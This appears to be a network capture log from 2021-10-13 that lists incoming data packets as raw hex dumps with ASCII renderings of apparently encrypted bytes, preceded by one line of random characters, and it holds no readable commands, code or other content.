lQvxUJ2^5g<AuAu.q29Clj/Xh,xdrWwpiFe.v*F9Q%fP0)F7=MwK^Q1qjoz#U`M-OWo+1%H7t;`TzOf;LwGZh{LWGI\"Slvt6+I
2021-10-13 13:52:00 UTC	405	IN	Data Raw: 8e 52 6c 81 d0 5c 76 c0 8a 37 c7 57 5f cd de 54 fc 00 86 8e 92 a1 1a b8 cb b8 82 f0 bf 66 c5 9e 62 52 5c 9a 98 fd 23 80 2d 43 5b 28 0b cb 01 e7 29 20 55 24 33 fc c4 bb 16 e4 df 2c d6 e8 21 01 b9 c6 c7 6d 58 3f a0 ac 2a 5e 50 48 5c da f8 05 2a cb 2a b8 a0 fc 09 31 a5 1f fe ab 64 87 81 ec c2 d4 d1 e1 7d 5c 66 cb 7a 51 1e 5d e3 3f a2 a4 40 5b 10 5f 9b f4 b1 1b aa e4 51 f4 0d 44 a1 fc d3 15 c3 03 2a 2b 7a 0e 45 a4 41 4d 3a 5b 5c 75 48 2a 15 ed 2f 7d 31 6c 29 87 60 9a 57 f3 98 b6 d7 49 63 17 2f 7d cf 47 9f 3c b4 0b aa 6d f4 b2 7c 4c 59 f6 cb 0d 0e 99 7b b4 7c 4b e8 ad 38 9e d9 14 63 62 2d fb 10 e1 3b ae d1 c8 a3 a0 59 84 cf 7c ab 87 1a 28 64 5c d3 3f 2d e0 a5 de d2 d9 51 7b ba a3 bd c8 d4 5e 02 58 33 89 7a f0 78 60 27 bc 76 34 03 0f 1d 71 40 e2 e3 45 7e ec aa Data Ascii: Rl\v7W_TfbR\#-C[() U$3,!mX?^PH\1d}\fzQ]?@[_QD+zEAM:[\uH*/}1l)`WIc/}G<m\|LY{\|K8cb-;Y\|(d\?-Q{^X3zx`'v4q@E~
2021-10-13 13:52:00 UTC	406	IN	Data Raw: 28 48 07 fc 85 1a 53 d9 07 7c 5d b9 dc 91 5c 53 07 79 27 d3 d5 96 10 5a d5 2d 4f 42 2e 02 d1 c1 69 4e 17 ba dc 7b 56 e8 9a 90 ff 68 d5 fd 36 56 90 53 36 78 5f 25 37 21 54 99 f6 09 6c 25 d3 05 cb 02 40 26 2d 76 b4 53 82 e3 3d 64 a4 ed 3e b9 38 7f 1f b6 ad ab 07 38 6e f6 3a 27 07 3f e7 ef bf 0e f1 68 35 48 91 69 91 09 45 1e bc ea 85 20 82 62 12 bf 35 98 eb a6 8f 1b c3 c3 41 c9 0a 61 e7 b4 34 d7 45 1f 11 83 71 a9 20 c3 9e fa 7b 6a 87 b4 6e ec f9 28 83 91 6f e1 de 5b f6 76 ad ee 31 c7 27 fb 29 f3 00 cb 4a 25 9c d7 9c 83 d9 20 21 c8 9b 59 a8 53 d5 3a 7b e8 1d b7 a7 a0 e5 fb 86 a5 0f 2a ad cd 84 71 d3 07 ac a2 c8 fc 1a 40 51 cd 9d 8e 03 4e 5b f2 0f 8e 9f 39 d9 25 84 e3 1b 49 bf e1 77 a5 1a 4e 45 59 70 fb 9b 2b 30 aa f7 af 22 cd 8f 96 15 af 27 05 ce 23 fd 6d ad Data Ascii: (HS\|]\Sy'Z-OB.iN{Vh6VS6x_%7!Tl%@&-vS=d>88n:'?h5HiE b5Aa4Eq {jn(o[v1')J% !YS:{*q@QN[9%IwNEYp+0"'#m
2021-10-13 13:52:00 UTC	408	IN	Data Raw: 02 23 6f 5c 0f 76 58 88 bc b8 95 80 13 aa 39 a1 8f 98 8d f5 1e 8d ea c5 68 a0 e6 06 c9 e5 3f ba 97 a4 4f 3b e3 8b 85 c6 77 78 50 cc 03 45 aa a3 33 34 82 67 e8 54 26 5e 8b 0d 36 c7 24 b4 67 f6 ad a6 ea 01 69 cb 10 f2 11 0e 33 97 41 1e 51 1c 77 52 8a 81 4d 5b fa e5 3c be f5 93 60 92 6c ef 46 a6 d0 f6 00 8d 64 e7 be 17 7e 80 d5 6e ea e0 08 f8 6c 09 8b 78 16 b5 06 86 19 9b 86 19 9d 62 c2 1f bc ea 95 6a c0 41 89 9e 58 f2 14 13 3a a9 ca 57 ff 45 b0 b2 ec b6 17 87 d2 4d 38 5a 2a c7 e2 71 b6 4f 6a 8b c4 46 69 cc 97 49 0e e8 92 10 78 8e 61 51 2d 52 37 ac 4d b6 1c 88 2f bc 33 c6 72 b9 88 75 88 6c b6 05 b7 e0 e3 d2 f4 ec 13 50 27 e1 54 28 6c 2a 8b e8 8c d6 7c 09 c9 15 77 02 b0 2a 19 81 8e 3b 95 23 68 6b 6c 6e 73 d7 c4 2e b5 ff 51 1c 7f 74 67 f5 8d 19 66 ce 24 2b c2 Data Ascii: #o\vX9h?O;wxPE34gT&^6$gi3AQwRM[<`lFd~nlxbjAX:WEM8ZqOjFiIxaQ-R7M/3rulP'T(l\|w*;#hklns.Qtgf$+
2021-10-13 13:52:00 UTC	409	IN	Data Raw: 29 72 f0 67 b1 48 47 a8 4c 99 cb dc ff b9 28 ba 65 af dc 0f d3 1f df 3f 38 cf e2 7c d8 21 b6 3b 5a 33 2f d4 ba 7f 0a eb a9 79 f7 98 57 b5 1b 48 d1 20 9a 7b 1b 6d a4 19 97 d3 5b 82 f0 3c a2 0d 6e f2 61 9c 4a 4e 08 fd 87 e5 9b 44 81 7a da 6e 18 a0 75 fe 24 9b 32 45 21 58 e3 4c 67 a4 ed f1 77 27 d8 c3 07 71 03 c5 83 f9 1f a2 bd 19 5b 0e 8e a0 76 d1 69 05 c4 3f a0 08 e2 29 43 6d cf f4 e0 c2 d4 d5 0e 8a 42 5d 10 17 5d 5d a2 1c e4 17 f3 0d 9f 14 5f 5b b3 db 42 27 71 f0 5a 1a 53 4a 55 c4 7b c8 80 ee b8 3d 21 f2 b8 71 f4 6b 69 3b 75 fb 3c a7 81 c3 95 a4 57 93 a4 30 44 fa df 75 f3 36 4b d6 71 62 28 a3 38 ae e8 59 c7 fb 11 34 e3 de 06 8c ce a1 79 7a bb 31 79 e4 1b 8d cc 05 75 8e 19 dd 0f 2d 20 d6 9f 92 bb 44 a9 c4 9b 2f 3e 86 31 f6 cc bc d4 38 d8 f1 c8 a3 2e cf c8 Data Ascii: )rgHGL(e?8\|!;Z3/yWH {m[<naJNDznu$2E!XLgw'q[vi?)CmB]]]_[B'qZSJU{=!qki;u<W0Du6Kqb(8Y4yz1yu- D/>18.
2021-10-13 13:52:00 UTC	410	IN	Data Raw: 02 f9 b3 c6 3c 31 22 32 92 33 19 57 04 3e f7 b5 97 25 34 39 44 c7 0e 47 f8 a8 5f d2 7a 2a 27 8e d2 ab b5 db ec 0f 5e 35 ce 61 ff e6 c7 b5 81 de 59 67 30 27 d3 07 b8 d8 6c 64 a9 b1 c1 ea 0a d1 c2 b9 4e 6c 6c a3 2d 46 65 9f 86 9f 68 da 29 23 84 13 97 b1 83 b3 50 27 28 f1 29 a6 82 aa 57 6e 48 54 d7 1b 73 c1 24 61 7d e5 0b f1 1a 97 12 b5 f7 4a c3 56 2b 7f 85 73 92 14 a4 82 13 3b 13 18 9b 0d 1e 94 cf b2 4a 12 20 18 43 39 d9 43 09 c6 61 65 52 2b 41 ca ea 21 d4 43 24 67 1a 29 cb d5 fe c3 04 7f c4 3b 70 e5 9e f4 69 7c 74 d2 ac 2c 59 3d f5 5d 55 98 93 0a be ba 38 c8 6a a5 50 70 88 3b 46 d2 fa 2a 54 d7 86 bb b9 e9 6d 6f 56 df 11 f4 41 1a 18 ab 08 12 31 7f 0f 58 5b c6 ca 84 76 04 4c af c9 e3 85 d5 71 50 e5 52 5d 37 57 e2 f0 51 0a 95 c5 9d f1 a4 80 5c 14 43 36 5c fd Data Ascii: <1"23W>%49DG_z'^5aYg0'ldNll-Feh)#P'()WnHTs$a}JV+s;J C9CaeR+A!C$g);pi\|t,Y=]U8jPp;FTmoVA1X[vLqPR]7WQ\C6\
2021-10-13 13:52:00 UTC	411	IN	Data Raw: ca a1 b3 02 59 99 65 89 fa df c9 5e b1 53 df 75 71 48 4c 73 4d 61 44 08 55 b0 00 a5 c1 f0 04 5b a0 2c 7f 87 7e 36 f8 2c 00 78 b0 a2 c7 ed aa 39 f1 80 9e fd 70 27 b0 6a f5 23 a3 85 69 09 6e 4a 31 05 6c d7 0b bf 76 79 f9 77 78 50 e5 70 45 aa ab b2 30 b7 39 e3 89 2b 6d fe 67 09 1c 41 49 2e 09 52 76 7f 95 92 4c 91 4b 10 ba a3 44 17 f6 3d 2d 13 ad cc 22 27 7b 77 f3 fc 47 6c e5 3e 84 6c ef dd de 2f 09 31 22 68 1a 41 6b 39 40 af dc 3d a9 d2 01 ae ce f3 64 ce 77 ad 2c 6d 4e 4e 46 ef 6a 95 3d 4d d3 af 12 cb 42 49 a4 3c 97 78 c6 c5 56 be 42 a2 79 58 eb 71 a1 e5 b2 16 5d e5 24 c5 78 e2 71 b6 30 f1 86 74 51 0f 4f 81 0d a0 e5 6b 9d 7a f2 a1 f2 0b 16 89 23 f9 fd e3 0b 52 f4 b8 3e 21 01 b7 7e 6a ca bb 43 dd 6b f1 00 97 b9 fa ad d8 9d 1b b1 6b 89 29 d4 10 08 72 81 b5 06 Data Ascii: Ye^SuqHLsMaDU[,~6,x9p'j#inJ1lvywxPpE09+mgAI.RvLKD=-"'{wGl>l/1"hAk9@=dw,mNNFj=MBI<xVByXq]$xq0tQOkz#R>!~jCkk)r
2021-10-13 13:52:00 UTC	412	IN	Data Raw: c7 3e f0 2a 37 4a a4 73 91 d6 fb f4 c9 84 f2 8e 01 5a 57 cb 6b 14 92 18 59 a2 b7 3f 4e 35 18 3f 62 29 44 36 0f d2 86 7b 37 a0 d4 6b fb e8 ad 39 44 1f b4 be cd 2d a9 10 e5 0b a1 d8 7b 0a b8 fb b8 26 c7 3e 87 03 a1 82 f5 ee d7 99 c2 60 71 51 1d 6b d5 14 dd 3f cb 59 d7 5a a7 c3 f4 6f 87 1a 47 50 85 d7 87 a1 35 f8 2c d3 31 2d a4 80 13 55 6b 7c 5b cc e4 d2 1b 22 fd 8e 94 f6 0e 08 d2 3d c1 c6 ac d5 2c 63 0e 76 7a ba e3 0e 83 57 b4 6e 27 bb f7 3c dd 39 38 8a d3 69 48 35 84 cf 71 4f 65 f6 02 1d 55 3b f4 cf 60 80 36 18 28 a9 10 f6 68 28 13 ad f6 ba 37 40 8f 07 e3 29 75 e1 a7 9b c7 f8 f7 00 2f 5b 4d 8d 30 e7 be 17 fd ac 8d fa 29 ef e6 23 e0 8c 52 0c 6c 12 91 79 b6 64 9d 15 67 9d 3d 6b 4d 4c b4 12 cb 2b f6 79 e7 26 6f 88 3a 3c 35 56 68 96 00 45 d8 b6 e8 ec 00 f2 b3 Data Ascii: >*7JsZWkY?N5?b)D6{7k9D-{&>`qQk?YZoGP5,1-Uk\|["=,cvzWn'<98iH5qOeU;`6(h(7@)u/[M0)#Rlydg=kML+y&o:<5VhE
2021-10-13 13:52:00 UTC	413	IN	Data Raw: 38 b8 12 ba b0 20 bd 7c ab 39 59 72 4b d3 ea 2e 2a a6 88 cb b5 2a 4f 84 0b 3e 57 fc 9d 10 3d 19 20 2e 10 8e b5 c6 fe 12 7c fc 0c 15 3c ea 3e aa 4d 3a 06 dd 01 1d 7a 2a e0 5e 40 a4 f4 20 08 48 85 51 9e 46 f9 76 a4 5b f2 df a2 53 ae 87 7e 0c c6 16 07 8a cf 4f b9 f8 7c 34 bc 40 d0 26 7e ed cb 33 af 72 9e 67 e7 2a 6f 74 05 ce f8 85 c2 d3 1d cc f2 ec 91 7a 4e c8 22 f8 b1 8a 28 ae 16 0a 62 bd e2 ba e7 47 f7 6a 86 65 4e fc 29 11 99 58 19 58 3f f8 b5 91 f8 28 1c c2 3a 7c cd c7 06 36 23 d7 57 25 17 a2 43 48 68 a2 b9 d6 31 fc a4 ab 50 77 55 40 13 24 e7 cc 44 c7 ce 3d 5a 8e 2f a4 de 68 92 6e b0 cb 07 20 d8 36 46 40 1c 50 e5 b9 97 7d 8e 9b cc da e6 53 07 5b 66 7e da 41 55 65 0c f4 b0 cc 9d 5f 99 74 d7 16 20 76 24 63 5f e3 90 a2 f3 24 5b 10 59 a2 fc d9 4f 4d 6d 2c 5c Data Ascii: 8 \|9YrK.*O>W= .\|<>M:z^@ HQFv[S~O\|4@&~3rg*otzN"(bGjeN)XX?(:\|6#W%CHh1PwU@$D=Z/hn 6F@P}S[f~AUe_t v$c_$[YOMm,\
2021-10-13 13:52:00 UTC	415	IN	Data Raw: d3 f5 73 c0 98 25 b7 aa cc 10 fa e9 a2 e4 9c ba ee 11 8e c2 ce 25 0d 3d c0 c1 30 02 b4 0f 34 8a 7d e2 8e 61 fc 80 d7 56 8e 78 ca 1b f4 9f eb 33 63 35 0f 17 5e 0c b5 32 ad 4b 94 59 46 0b 7b c4 e8 c0 95 92 ad 64 84 25 9a 49 89 05 92 c9 b8 df 05 0a 9a b2 96 fb 1f 51 3b 68 ab c8 1e 09 80 b3 44 16 52 ff 1c 7b 2e 0a e2 47 d2 ed b0 20 13 39 f0 c0 44 4b 6f b1 1f 4c ba f2 3d 88 88 32 e2 ed 3d 31 52 2c 28 9a a9 01 72 c0 34 f7 71 de c7 96 a2 93 bd 71 28 aa 5e 54 17 cf a5 8b cf 38 c7 2e fd ad 40 a5 70 bd 3e 28 48 84 82 67 bc 5a ed 98 87 23 a9 c0 35 3c 93 33 db c7 5a 5c bf 53 09 ef 68 23 6f fe d6 1b ab eb 88 c8 d2 e7 24 b7 20 96 12 c1 b4 52 4a 92 55 09 d1 3c 39 fb 09 82 e5 27 13 18 23 89 66 1b 89 f3 48 c0 69 89 33 48 1e bc d2 44 f4 7a 25 3f 40 76 15 44 8a 16 6d b1 85 Data Ascii: s%%=04}aVx3c5^2KYF{d%IQ;hDR{.G 9DKoL=2=1R,(r4qq(^T8.@p>(HgZ#5<3Z\Sh#o$ RJU<9'#fHi3HDz%?@vDm
2021-10-13 13:52:00 UTC	416	IN	Data Raw: 4a 9d 07 16 e4 3a e3 6a 4c b5 ac 0c ad 5e 1a 90 50 aa 3b cb cc 23 29 68 ee 93 45 93 cf df fc 51 18 e9 24 da 7f ef 2f 74 84 7d 2d 87 cf 4e 7b 06 ad 5e cf 62 93 94 66 38 b2 e3 03 fa 9d 4e be 63 78 b6 2e 01 99 f7 8c f5 5e 46 7b d0 a7 b6 17 fc 81 fa eb 5c 61 ef b9 ec 7f da e4 01 05 e4 85 0f 4e 92 d3 b8 b3 89 a7 4d 2a e2 54 75 c9 2a 26 1a 41 1e 99 18 c1 a7 2c cf 2b a5 55 08 d4 b6 9c 0f 87 12 20 3f c4 94 a3 7b 7b e8 87 ed 50 40 e0 ec aa b4 a4 32 47 f0 89 46 72 15 14 ff e6 0d 45 0f 68 7a d5 03 09 49 52 44 89 85 68 cf a0 1a af c2 c6 6e 24 7a a8 98 d5 48 20 3c 51 a0 e9 96 4a a9 3c 1f e5 a9 0a 44 d9 a2 27 fc bb 11 19 54 92 55 41 84 12 f6 f0 b6 ad bc 32 6a 42 97 f6 15 39 b9 2e 6c 8c 7d 66 78 82 f6 00 02 1a 2b e9 ab 13 21 1f b4 10 73 df a9 19 ed 72 ad ed 8e 77 8c a2 Data Ascii: J:jL^P;#)hEQ$/t}-N{^bf8Ncx.^F{\aNMTu&A,+U ?{{P@2GFrEhzIRDhn$zH <QJ<D'TUA2jB9.l}fx+!srw
2021-10-13 13:52:00 UTC	417	IN	Data Raw: 9b 2e 34 6f c1 bf 35 15 25 01 95 b9 ff 1a 89 9a 93 f2 7b 7f 7f be be 96 d5 9f a4 3b c7 42 b0 fa 7b e1 69 9b 35 dc dd 12 6b 02 f2 b1 8d 38 61 e9 fc ed 72 55 ba f4 67 bd 85 0b d6 30 df 6d 6f 85 dd 40 7b 1f 65 5c 43 54 12 27 f4 2d 40 74 f8 94 de b6 98 82 ba fa 20 e7 ca 4d 0e e0 e4 98 fd d6 30 69 38 4d d4 c0 36 85 b7 71 b0 56 10 a7 52 50 8b 10 8b 93 40 11 7b a5 1a 4b 71 76 e9 ee 96 21 a0 62 60 43 41 41 ee a2 ca 26 62 84 10 8e 8c 21 e8 a4 cc f2 cf 91 7a 6b c8 22 d5 b0 8a 0d cf 90 5e eb f8 bb 4e b6 12 ba 27 67 f8 c8 3d 55 98 dc ba 1d 50 21 20 9a 7b 1b 6d 98 4b f6 d3 b0 e8 f0 36 3b d5 b8 f1 ae d7 4c dd 87 a0 c9 7c 3e 42 2e fa 64 77 5d 50 fc d0 86 33 ec 28 ba 80 9c a1 fd d1 f4 2a bf 8c 3b 86 17 fa 00 ab 14 ef b4 fe e1 8d f6 a0 84 67 33 a6 ca 68 46 4f ed 00 e6 a2 Data Ascii: .4o5%{;B{i5k8arUg0mo@{e\CT'-@t M0i8M6qVRP@{Kqv!b`CAA&b!zk"^N'g=UP! {mK6;L\|>B.dw]P3(*;g3hFO
2021-10-13 13:52:00 UTC	419	IN	Data Raw: cc b2 4f 36 6d 63 8f 7c cd 85 a8 2e 0e 5f 8b 32 65 08 c2 e6 28 4d e5 ed 34 10 da 1c 34 e5 91 77 96 db a0 0f 57 ec a7 e9 70 a1 b8 f1 e9 a2 3e 49 5a 35 1d 8e 6e 1d 09 86 2c 4d 69 47 bb 63 d3 f4 e7 d4 91 e4 96 57 80 fb 8d 34 54 ca 27 33 6e 68 b7 bb 8f 82 73 7a 5c c8 f2 fd 3a 26 5a 07 f4 2f 7f c7 27 93 4a 11 ca 28 8b 45 8c a2 28 ee f2 fe 0d 93 ed ff c3 69 04 9c 1e 76 1f 6d 72 bf de d7 9f 38 2d 06 2d 1b 4a 53 f4 c9 31 94 2f e5 57 0c 3a 2e 6e 2f 7f 5c 20 bb 15 d4 e1 ca 9f 1a 22 7a ec 87 ef d3 fb c9 ce 77 df 62 ca 00 8c 3a e6 ad c2 c3 ac 07 84 35 db 58 00 d4 5a 58 8b 20 f4 b6 d1 d0 d1 7b 6d ce 23 3e 5c 52 dd a5 09 65 81 28 8b f2 91 a6 c2 03 3e 43 87 75 6b f4 39 0c fa f7 10 a4 b1 88 42 ee 9e 26 2d 26 60 c5 c8 18 cd 1f eb 29 1a 32 1f bc 19 65 ac 05 07 15 87 32 6e Data Ascii: O6mc\|._2e(M44wWp>IZ5n,MiGcW4T'3nhsz\:&Z/'J(E(ivmr8--JS1/W:.n/\ "zwb:5XZX {m#>\Re(>Cuk9B&-&`)2e2n
2021-10-13 13:52:00 UTC	420	IN	Data Raw: 1f 7d 03 1f ce da f1 1a 8e 0a 8e aa 89 29 ab e7 c8 f0 6d d5 55 a5 99 74 d7 15 10 17 77 6d 5d e3 e2 cf 83 73 a4 ef 82 3f 3e 20 4a 27 f2 65 1d 71 43 e5 a5 b9 42 f7 fc d5 fb e9 2d 09 2e b9 75 83 60 c1 8d 79 2d 82 10 5d aa 4c 14 ae 85 cf 32 ef ea ed 23 d7 c2 f9 94 81 78 c7 3c 93 f8 c0 b1 ef b6 54 f6 07 c1 c9 10 c9 67 0f 46 63 44 a1 b6 17 ff 3f 98 b1 b4 5c 48 2d a9 18 f9 98 3a aa a5 5a 52 22 f9 4c b8 b3 87 25 29 03 87 c1 37 99 79 4d 2c c2 1d 59 c3 b4 a1 04 3c 51 a5 76 11 b1 46 de 5e 6f af 3f 7a 28 e2 09 44 75 50 84 bf ea aa 97 3e 39 39 f1 5d d1 14 eb e4 72 95 a8 3b 82 29 d2 b7 f4 ac 39 53 07 00 ba 82 76 7e 39 27 5d af f8 2a 44 39 20 f7 6c 56 bf 3f d4 c3 03 1f 37 e1 69 39 b1 9a 8a 96 e5 ed 61 de c9 12 f2 bd b0 5e d0 c1 15 da 99 fb 40 fa 7e 27 f8 b3 7c 67 18 b2 Data Ascii: })mUtwm]s?> J'eqCB-.u`y-]L2#x<TgFcD?\H-:ZR"L%)7yM,Y<QvF^o?z(DuP>99]r;)9Sv~9']*D9 lV?7i9a^@~'\|g
2021-10-13 13:52:00 UTC	421	IN	Data Raw: 60 73 31 03 a8 47 bd 80 54 73 51 00 fc 6a e1 e8 13 1b d0 41 88 11 81 f3 48 c6 b6 f4 0b 2a e1 43 d7 6b c9 e4 d7 c0 34 bb 11 74 8a 70 e7 fc 90 4a 9e 1c 32 0f 3b f4 a5 ff 4c 85 ce 1c 67 bf 47 12 77 2e ba 6c 5b 7f 8e 35 d0 0d fb 6f b2 4d 30 e8 11 ac 68 ba 09 33 72 e2 f2 7d 5b b5 12 03 f8 90 6c 19 3e 24 cc 90 ad 12 df 5a 64 15 c8 90 e2 4f 98 12 a7 46 c9 50 23 b0 84 d5 b6 5e 78 50 29 f1 9f b3 8d da 8c 14 12 b4 0d 8b cb 09 9e 4c 73 f0 24 87 23 c0 95 3c 12 b8 74 f0 1e d6 e2 21 67 bf a2 23 2b 37 91 7d 14 77 e6 19 af ae 06 89 20 54 23 e8 77 ce 8c a7 96 3b 86 41 67 3d c0 a5 e2 aa 16 7c bb a9 d8 b6 2d 91 7e a2 09 bb 95 51 fb 16 dc ba 93 dd d8 f7 f8 71 71 6d 79 cd 7b 84 44 82 9a bf 31 7d d9 c9 dd 5c 11 92 05 4f c9 29 ce 44 fb ff 3c fe 18 ca 75 20 3f 1c e8 3b f1 d4 e2 Data Ascii: `s1GTsQjAH*Ck4tpJ2;LgGw.l[5oM0h3r}[l>$ZdOFP#^xP)Ls$#<t!g#+7}w T#w;Ag=\|-~Qqqmy{D1}\O)D<u ?;
2021-10-13 13:52:00 UTC	422	IN	Data Raw: 76 6e 55 c1 bc 1f 7e 4d 7b 24 26 b1 04 16 84 41 e6 3a 07 60 d2 ad 41 43 62 68 70 41 bb ab cd 8e 75 c1 8f a8 5c 6d 8a 4f cd 10 d2 fb f0 a1 86 6c 8d 19 1d c6 6b d1 5b 98 6d c3 41 fd c0 e9 00 9d 77 b1 78 b6 78 be 13 2c 93 a4 36 fc 04 62 7f 30 b3 4a cc 96 6d be 32 fd 05 c4 5b ea b3 dd 4b 2a a9 9a 45 68 7d c1 f0 c7 05 df cb 84 12 68 ee b6 6b e7 60 12 42 28 f1 e9 1e 74 f9 e3 7b 99 29 f7 1a 68 24 bd 29 9c e8 bf 3b f5 fb 1c 53 f9 6d 65 d9 48 05 d1 a1 27 6f 06 9c 95 ae 6e ac c9 6c 73 7b 1e 32 74 52 51 1c d1 af 0a 76 cd e6 99 6c 59 19 39 5a c7 92 90 00 8e bb 38 d6 2a 9e e9 a0 2d 78 2c 1f 7a 2d 54 bf 9a 94 75 61 be 51 82 10 21 38 3f 18 d6 a7 f0 87 d8 5a d3 9c cf a5 25 cf 38 c7 66 ff ad 40 a5 22 9e 3e 28 13 50 ea 19 ee 5a ed 98 82 23 a9 a3 81 e6 56 15 ac ad e5 4f 66 Data Ascii: vnU~M{$&A:`ACbhpAu\mOlk[mAwxx,6b0Jm2[KEh}hk`B(t{)h$);SmeH'onls{2tRQvlY9Z8-x,z-TuaQ!8?Z%8f@">(PZ#VOf
2021-10-13 13:52:00 UTC	424	IN	Data Raw: 11 b5 fe 18 2d 38 5d 23 41 ec e8 63 3d f9 ac 2f a4 66 2f fe 9a b0 cb 6d 71 d8 e6 94 ec b2 47 4c 5a 1e f0 03 32 e3 77 e5 30 2e a3 62 38 4a a2 e5 74 87 81 e8 cc 55 2d 34 e1 20 2d 46 ae 2c b5 be 4e 87 e2 78 8e 5b 9d 97 27 a4 3e 07 f7 20 49 52 7a bb f3 21 bd 4c 02 03 2a c2 be 93 95 af 66 70 eb bf cd 01 3c f4 32 3f f3 10 81 15 d6 78 b3 09 93 01 3c b7 51 ca 99 94 eb 33 c1 54 b6 c6 bc b6 b9 95 97 2d 7b d1 9e f1 b4 05 85 4c f2 36 5c 49 82 ad 3b 43 a1 d9 e4 62 2d 22 dd 31 4a 16 8a a4 81 5d 25 bf 5c bb 73 03 5d 55 77 0a 84 88 97 a1 40 83 92 b9 e2 35 94 f6 26 26 c1 3d 91 44 69 80 d2 8e 6b 1f ac 7a 28 5c 9c b7 2a a5 c6 5a 31 b8 95 65 ef d7 78 9b e7 7e a4 a1 84 9c d2 99 7f 4b 23 d6 a0 95 5f da c1 6a 37 fa fa f3 7c b7 a7 fd 3b 4b 00 14 a9 b2 fe bb b0 f6 19 a5 8a 0d b3 Data Ascii: -8]#Ac=/f/mqGLZ2w0.b8JtU-4 -F,Nx['> IRz!Lfp<2?x<Q3T-{L6\I;Cb-"1J]%\s]Uw@5&&=Dikz(\Z1ex~K#_j7\|;K
2021-10-13 13:52:00 UTC	425	IN	Data Raw: a7 79 dc db dd c3 df 0d 22 cd c0 2d b4 99 7d 54 e7 d6 b6 95 96 0b e5 3a 7b 9e 1f 5a 49 1c b9 18 eb 29 22 3c ad 4f 16 e7 81 54 f8 44 bf 72 61 e1 82 13 17 94 87 0f 19 8b 9b b7 49 b4 3d 4f ba 8b 43 d7 d5 99 64 cd c0 bf 5d 54 9d 30 50 8e 3c fb cc c1 40 bb 4a a5 1c d3 a3 9c d5 f7 b5 8a 95 67 78 fa 11 6a b8 c9 b6 99 2d aa 6b e2 6f b1 e5 5c 0d 12 59 84 b2 69 33 25 39 3e c0 ef d6 82 0e 92 90 85 dd 04 4c b6 b6 a8 b3 3e 12 16 7f 9f 4b 3e e2 12 05 c9 da 09 5f cf b9 39 cc 12 bf 35 c6 a2 9f 42 6b c0 bd 25 bc 08 63 0e 33 14 a2 b1 4f 9b d9 4f 87 74 1d 4d 6d c5 97 3c 03 1d 17 d9 7e ae 98 90 0c 27 d8 43 25 cc ee a2 f9 47 a1 4a 99 cb d4 6c fd 13 6a 08 ac 3d 55 8c 2b 67 69 6e 44 3a cf 22 dd eb f8 03 c5 21 55 6a 14 82 0c 43 b4 f6 98 dc 83 e5 e9 d6 f5 f4 7a 71 6d cb 3e 8f 81 Data Ascii: y"-}T:{ZI)"<OTDraI=OCd]T0P<@Jgxj-ko\Yi3%9>L>K>_95Bk%c3OOtMm<~'C%GJlj=U+ginD:"!UjCzqm>
2021-10-13 13:52:00 UTC	426	IN	Data Raw: 4a 00 0d a9 b2 f0 54 7c 63 56 86 d7 c1 22 d1 c3 ec 6d 13 4c b4 7c fe 63 7d 8a 03 84 ab 14 b1 df 04 e8 53 dc a9 24 30 c0 ae 3e b5 16 b1 06 cc e7 74 ca 5c 8e 45 8e 49 80 c6 b0 e5 54 55 eb 3b 13 98 dc 64 17 07 d7 69 03 8b f1 1a a8 07 f4 a1 a0 49 0b df ea c2 ac e0 a9 12 12 cb 41 4e b1 8a 72 91 7d c5 91 70 af fe 13 39 bb e0 0c 44 77 16 2e b3 0b 17 7c 95 71 52 4d 26 40 04 3f 69 a8 fd c2 0b b5 96 06 14 7b 9e ae 97 05 a8 cb 84 c2 60 0f e1 a8 b8 54 25 0f 26 b2 dd ac e5 88 bb 13 f7 be 95 17 4f ad b2 18 8c 55 66 73 8b e8 5f 99 d9 ee 48 ee 8c 26 d2 f1 32 95 8f 9b 18 76 6b b4 5e b3 e6 28 1f 36 a2 1e ff 0b dc 5e 8f 22 bf 4c ee b7 8b a9 6e d8 38 1b 42 b4 d3 3d c7 5f 24 0e 95 9b f2 f2 5f 90 e2 59 e6 ce 75 fc 07 db e9 88 56 94 b4 b9 c0 91 d0 13 03 fd e7 a7 4a 63 65 56 51 Data Ascii: JT\|cV"mL\|c}S$0>t\EITU;diIANr}p9Dw.\|qRM&@?i{`T%&OUfs_H&2vk^(6^"Ln8B=_$_YuVJceVQ
2021-10-13 13:52:00 UTC	427	IN	Data Raw: dc ba 13 d9 dd fc 7c 3e cf 96 0d b4 2e d8 ac d1 80 40 99 a0 a4 70 a9 a3 ee 97 05 e7 31 29 ce 44 95 93 2f fc 1a a0 f8 28 ae 37 46 c7 61 58 29 d8 7e f2 05 3e 7f 6f 4f 48 c3 55 d0 63 30 82 8b f9 b5 df 1e 7d 1b b3 ca da f1 22 fb b3 20 b5 e5 d6 28 a0 00 71 20 4e 94 7c 65 8b 28 cc 0b 03 f6 6e 27 c8 96 b5 04 de 0a 9d 47 0b 0f 4c b5 75 27 1a 08 f2 bb f3 42 36 b4 f7 fc a9 6c aa 93 7c 02 7a db fc f9 20 8f 3c 79 7f b8 4a e0 b3 91 d6 12 31 a7 af 55 aa 5e 1a ad 6c 6b 66 e8 96 4a 14 fa 6f a6 7f 94 bc a6 45 d8 cb 78 c9 80 83 17 0d c3 a3 18 65 f8 95 41 1f d7 99 8a 34 2c 6c de 98 3a aa a5 41 29 e4 fe 97 cd ae 6a 8c 5f 7d 0a 09 52 1d d3 5a 21 01 4b b1 f4 bb dd 3f b7 10 56 87 98 33 8f 29 0e 87 9f 27 2f d4 38 d1 09 2c d5 7c 43 e9 af f2 69 76 c2 0e 21 45 4e 96 e5 72 15 97 d3 Data Ascii: \|>.@p1)D/(7FaX)~>oOHUc0}" (q N\|e(n'GLu'B6l\|z <yJ1U^lkfJoExeA4,l:A)j_}RZ!K?V3)'/8,\|Civ!ENr
2021-10-13 13:52:00 UTC	428	IN	Data Raw: 45 33 ac 3e 10 6e 8a ac ff bb 71 ee 6f e3 9a 6f 2f d0 5d d3 de ed 41 40 30 67 5e d8 b2 d9 b9 35 d6 b9 4e e2 27 39 c6 bc 71 75 eb 4a 67 fe 2f 5c 30 38 3a 33 94 55 ff 64 24 a4 a9 86 2b 7e da b7 97 f4 c3 bc 09 0f 8c 90 16 75 55 56 2f 28 2e eb 2d df 29 ce cf 6d 70 7b 16 93 b4 cc 26 3f c4 ba e8 32 03 36 a9 6a 50 bd f0 12 78 31 cb 07 7e e2 e6 98 37 ae 57 34 19 1c 7d 9a 57 b0 e1 02 4b f9 a2 62 3f c8 a2 f6 68 4b cf 9d 99 62 64 e9 ce dc 17 ae ef 20 e3 a2 97 22 42 91 8c 0a 9b 2a 3f 77 33 4a 27 f2 65 05 c1 4d 7a ef df cd f7 77 1b 25 1a 3a c0 7f 34 20 88 53 